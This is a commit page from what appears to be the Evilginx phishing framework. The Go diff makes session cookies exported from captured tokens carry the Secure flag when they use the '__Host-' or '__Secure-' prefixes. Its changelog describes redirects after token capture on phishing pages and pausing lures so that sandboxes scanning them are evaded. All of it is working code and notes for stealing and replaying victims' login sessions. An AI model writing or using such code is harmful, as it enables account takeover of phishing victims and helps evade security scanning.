added support for __host- and __secure- exported cookie names

RegH3x · Sep 28, 2023 · 04ca6a3 · 04ca6a3
1 parent a8d2cd3
commit 04ca6a3
Show file tree

Hide file tree

Showing 2 changed files with 8 additions and 0 deletions.
diff --git a/CHANGELOG b/CHANGELOG
@@ -1,3 +1,6 @@
+# Unreleased
+- Fixed: Added support for exported cookies with names prefixed with `__Host-` and `__Secure-`.
+
 # 3.2.0
 - Feature: URL redirects on successful token capture now work dynamically on every phishing page. Pages do not need to reload or redirect first for the redirects to happen.
 - Feature: Lures can now be paused for a fixed time duration with `lures pause <id>`. Useful when you want to briefly redirect your lure URL when you know sandboxes will try to scan them.

diff --git a/core/terminal.go b/core/terminal.go
@@ -1207,6 +1207,7 @@ func (t *Terminal) cookieTokensToJSON(pl *Phishlet, tokens map[string]map[string
 		Name           string `json:"name"`
 		HttpOnly       bool   `json:"httpOnly,omitempty"`
 		HostOnly       bool   `json:"hostOnly,omitempty"`
+		Secure         bool   `json:"secure,omitempty"`
 	}
 
 	var cookies []*Cookie
@@ -1219,6 +1220,10 @@ func (t *Terminal) cookieTokensToJSON(pl *Phishlet, tokens map[string]map[string
 				Value:          v.Value,
 				Name:           k,
 				HttpOnly:       v.HttpOnly,
+				Secure:         false,
+			}
+			if strings.Index(k, "__Host-") == 0 || strings.Index(k, "__Secure-") == 0 {
+				c.Secure = true
 			}
 			if domain[:1] == "." {
 				c.HostOnly = false